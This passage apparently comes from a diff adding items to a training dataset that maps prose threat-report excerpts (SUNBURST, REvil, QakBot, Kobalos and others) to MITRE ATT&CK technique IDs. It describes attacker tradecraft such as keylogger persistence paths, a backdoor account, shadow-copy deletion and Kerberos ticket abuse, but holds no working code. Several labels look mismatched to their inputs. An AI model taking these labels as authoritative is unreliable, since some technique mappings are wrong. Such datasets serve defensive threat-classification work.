Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "netbook or inexpensive laptop - Raspberry Pi computer - Bash Bunny, a special tool for carrying out USB attacks", + "output": "- T1200: Hardware Additions" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To capture login credentials from all the previously listed websites, Javali monitors processes to find open browsers or custom banking applications. The most common web browsers thus monitored are Mozilla Firefox, Google Chrome, Internet Explorer and Microsoft Edge", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The information collected is performed using WMI queries: Additionally the malware lists the running process via the Microsoft Windows API. The malware uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on bitwise (SUB 0x0F XOR 0x21), here is the decoded data", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This recent campaign used malicious documents to install malware on the targeted system using a template injection attack. This technique allows a weaponized document to download an external Word template containing macros that will be executed. This is a known trick used to bypass static malicious document analysis, as well as detection, as the macros are embedded in the downloaded template", + "output": "- T1059.005: Command and Scripting Interpreter - Visual Basic" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The SUPERNOVA webshell is an anonymous code C# webshell written in .NET C# that is specifically written for usage on SolarWinds Orion servers", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign. 2) The script uses the function radador(), which returns a randomized integer. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The group has made significant improvements to their arsenal recently and has both developed new tools and modified existing ones. The key observations covered below are based on CrowdStrike\u00ae Intelligence analysis of BazarLoader, Conti and Ryuk operations", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "CrowdStrike also identified a connection between StellarParticle-related campaigns and the abuse of Microsoft Cloud Solution Partners\u2019 O365 tenants. This threat actor abused access to accounts in the Cloud Solution Partner\u2019s environment with legitimate delegated administrative privileges to then gain access to several customers\u2019 O365 environments", + "output": "- T1199: Trusted Relationship" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Malware used by the threat group can be configured to bypass network-based detection; however, the threat actors rarely modify host-based configuration settings when deploying payloads. The threat actors demonstrated the ability to adapt when reentering a network after an eviction, overcoming technical barriers constructed by network defenders", + "output": "- T1056.001: Input Capture - Keylogging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In one of these campaigns, Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest. It then packages stolen files into a password-protected RAR archive. The malware then uses WebDAV to upload the RAR archive to a Box account", + "output": "- T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n- T1560.001: Archive Collected Data - Archive via Utility" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TA505 sent several similar campaigns in mid-October with VBScript compressed in 7-Zip files that also downloaded either Locky or The Trick. By late October, the actor switched to Microsoft Word attachments that abused Dynamic Data Exchange (DDE) to download either Locky or Locky and The Trick in several more geo-targeted campaigns. This was the first time that we observed TA505 abusing DDE, a legitimate feature in Microsoft Office that became a regular part of multiple threat actors\u2019 toolkits in Q4 2017. Recipients of these emails, which also used simple lures with attached fake invoices, needed to open the Microsoft Word attachments and click through a security dialog (Figure 3) to download the malware", + "output": "- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In addition to these malware families, GALLIUM has been observed employing SoftEther VPN software to facilitate access and maintain persistence to a target network. By installing SoftEther on internal systems, GALLIUM is able to connect through that system as though they are on the internal network of the target. SoftEther provides GALLIUM with another means of persistence and flexibility with the added benefit that its traffic may appear to be benign on the target network", + "output": "- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes. Instead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks. The same exploit was used in the ExPetr", + "output": "- T1210: Exploitation of Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another new feature in the latest UPPERCUT sample is that the malware sends an error code in the Cookie header if it fails to receive the HTTP response from the command and control (C2) server. The error code is the value returned by the GetLastError function and sent in the next beacon. This was likely included to help the attackers understand the problem if the backdoor is unable to receive a response (Figure 9). This Cookie header is a unique indicator that can be used for network-based detection", + "output": "- T1071.001: Application Layer Protocol - Web Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain\u2019s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account", + "output": "- T1134.005: Access Token Manipulation - SID-History Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The presence of this credential stealer may partially answer how Kobalos propagates. Anyone using the SSH client of a compromised machine will have their credentials captured. Those credentials can then be used by the attackers to install Kobalos on the newly discovered server later", + "output": "- T1056: Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Extracting and dropping an OpenSSH binary from its PE resources - Extracting, dropping, and configuring the RDP Wrapper Library software from its PE resources - Creating a new user \u201csupportaccount\u201d with a password of \u201cGhar4f5\u201d - Adding this user to the \u201cRemote Desktop Users\u201d and \u201cAdministrators\u201d groups", + "output": "- T1136.001: Create Account - Local Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Poseidon utilizes a variety of tools. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "As the final reconnaissance step, if the system is domain-joined, BoomBox executes an LDAP query to gather data such as distinguished name, SAM account name, email, and display name of all domain users via the filter (&(objectClass=user)(objectCategory=person", + "output": "- T1087.003: Account Discovery - Email Account\n- T1087.002: Account Discovery - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Operational since April 2019, the group obtained the GandCrab source code from GOLD GARDEN, the operators of GandCrab that voluntarily withdrew their ransomware from underground markets in May 2019. CTU researchers assess with high confidence that GOLD SOUTHFIELD is a former GandCrab affiliate and continues to work with other former GandCrab affiliates. In December 2019, GOLD SOUTHFIELD began operating a name-and-shame style website that uses stolen data from intrusions to generate additional leverage against victims; a tactic known as double extortion. Despite GOLD SOUTHFIELD's infrastructure being taken down by law enforcement in October 2021, the REvil leak site re-emerged in April 2022 with several new victims added. GOLD SOUTHFIELD also began recruiting exclusively via their leak site using the peer-to-peer secure messaging software Tox Chat. GOLD SOUTHFIELD's affiliates distribute ransomware through a variety of means including exploit kits, scan-and-exploit attacks, publicly-accessible RDP, remote management and monitoring (RMM) servers, and backdoored software installers. As of May 2022, the group continues to operate REvil as a name-and-shame scheme and uses a leak site to post victim information and recruit affiliates", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After all this, if the malware successfully discovers a viable target and is able to gain access through SSH credential brute forcing, the malware will be able to begin installation of the cryptocurrency miner. Linux Rabbit attempts to install both \u201cCNRig\u201d and \u201cCoinHive\u201d Monero miners onto the machine, but only one will actually successfully install depending on what type of architecture the machine is. If the machine is a x86-bit, it will install CNRig Monero miner and if the machine is an ARM/MISP, it will install CoinHive. If the infected machine is a web server, the malware will inject CoinHive script tags into every HTML file, so that even visitors of the site/server are also infected with the cryptocurrency miner. Linux Rabbit is able to connect to GitHub and receive updates from the threat actors. It also has a killswitch built-in. It is able to detect other miners already on a target machine and delete them from the machine during the installation of its own miner", + "output": "- T1110.003: Brute Force - Password Spraying" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Multiple SUNBURST samples have been recovered, delivering different payloads. In at least one instance the attackers deployed a previously unseen memory-only dropper we\u2019ve dubbed TEARDROP to deploy Cobalt Strike BEACON", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "How about DPAPI with keys tied per user & system. Volume serial ID keying. See the APT41 talk #FireEyeSummit7:19 PM \u00b7 Oct 30, 2019\u00b7Twitter for Android12 Retweets1 Quote Tweet35 LikesNick Carr@ItsReallyNick", + "output": "- T1480.001: Execution Guardrails - Environmental Keying" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In one instance, the threat actor gained remote access to a high-value system in a compromised network, ran quser.exe to identify existing RDP sessions on the device, immediately ran a command to compile a RAR archive that specified file types the threat actor did not want, and used a password to encrypt the archive", + "output": "- T1005: Data from Local System\n- T1119: Automated Collection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The actors have regularly\u00a0leveraged Cobalt Strike\u00a0BEACON\u00a0and Metasploit Meterpreter to move laterally within victim environments. The actors commonly moved\u00a0laterally within victim environments\u00a0using compromised accounts\u2014both those belonging to regular users and accounts with administrative privileges. In addition to the use of\u00a0common post-exploitation frameworks, lateral movement has also been achieved using WMIC commands and the Windows RDP\u00a0and SMB protocols. The actors used the Windows\u00a0net use\u00a0command to connect to Windows admin shares to move laterally", + "output": "- T1078.002: Valid Accounts - Domain Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Whitefly usually attempts to remain within a targeted organization for long periods of time\u2014often months\u2014in order to steal large volumes of information. It keeps the compromise alive by deploying a number of tools that facilitate communication between the attackers and infected computers", + "output": "- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "By gaining access to the configuration panel the attackers configured the Apache web server and started using the router as a proxy server between the organization\u2019s corporate and restricted segments", + "output": "- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "GetST.py: Given a password, hash, aesKey or TGT in ccache, this script will request a Service Ticket and save it as ccache. If the account has constrained delegation (with protocol transition) privileges you will be able to use the -impersonate switch to request the ticket on behalf another user. GetPac.py: This script will get the PAC (Privilege Attribute Certificate) structure of the specified target user just having a normal authenticated user credentials. It does so by using a mix of [MS-SFU]\u2019s S4USelf + User to User Kerberos Authentication. GetUserSPNs.py: This example will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with JtR and HashCat. GetNPUsers.py: This example will attempt to list and get TGTs for those users that have the property \u2018Do not require Kerberos preauthentication\u2019 set (UF_DONT_REQUIRE_PREAUTH). Output is compatible with JtR. ticketConverter.py: This script will convert\u00a0kirbi files, commonly used by mimikatz, into ccache files used by Impacket, and vice versa. raiseChild.py: This script implements a child-domain to forest privilege escalation by (ab)using the concept of Golden Tickets and ExtraSids", + "output": "- T1558.003: Steal or Forge Kerberos Tickets - Kerberoasting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Creates events \"\"__klg__\"\" and \"\"__klgkillsoft__\"\" to act as mutexes and facilitate self-removal. Installs itself to %APPDATA%\\Intel Corporation\\IAStorIcon.exe. Creates an entry in the user's Startup folder for persistence. Uses the SetWindowsHookExW API function to capture keystrokes system-wide. Formats and writes the keylogger output to %APPDATA%\\Update\\Tmp\\k%d.txt, where %d is the current system tick count\"", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The dropper has its encrypted payload embedded as an overlay of a PE file as extra data that will never be used in normal execution steps. Its decryption routine, part of an executable physical patch, begins somewhere between the start() and WinMain() functions. A fun fact is that the malware authors embedded their malicious code into a binary that was a harmless executable", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The recipient email addresses suggest they may be the addresses used for specific regional branches of the targeted organization. However, based upon the captured session data, it is highly likely the source email address was spoofed. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. While this is not a new tactic, this is the first instance where we have observed the OilRig using it in their playbook. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After trying to determine whether ports are open and the machine could act as a C2 tier 2 proxy, the proxy module also starts a multithreaded SOCKS5 proxy server. The SOCKS5 protocol is encapsulated into the QakBot proxy protocol composed of: QakBot proxy command (1 byte), version (1 byte), session id (4 bytes), total packet length (dword), data (total packet length-10). Incoming and outgoing packets are stored in the buffers and may be received/transmitted one by one or in multiple packets in a single TCP data segment (streamed", + "output": "- T1572: Protocol Tunneling" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The core component will check whether it is located in the %temp%\\[appname] directory, otherwise it copies itself to %temp%\\[appname]\\[appname] and set the file attribute to hidden", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "First, the malware checks for the existence of a Mutex value, \u201cEKANS\u201d, on the victim. If present, the ransomware will stop with a message \u201calready encrypted. Otherwise, the Mutex value is set and encryption moves forward using standard encryption library functions. Primary functionality on victim systems is achieved via Windows Management Interface (WMI) calls, which begins executing encryption operations and removes Volume Shadow Copy backups on the victim", + "output": "- T1486: Data Encrypted for Impact" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "All of the attacks involved spear-phishing emails to deliver malicious documents that required the recipient to carry out some action. The payload in a majority of these attacks was a backdoor called Spark, which is a backdoor that allows the threat actors to open applications and run command line commands on the compromised system", + "output": "- T1204.002: User Execution - Malicious File\n- T1204.001: User Execution - Malicious Link" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To ensure that the compromised system is unable to restore from backup, REvil deletes shadow copies and disables recovery mode by executing the following command via ShellExecute. The length and uniqueness of this command allow for the development of high-fidelity detection controls", + "output": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "an \u201cobject_id\u201d that is a unique uuid used to identify the victim, when the value is not set 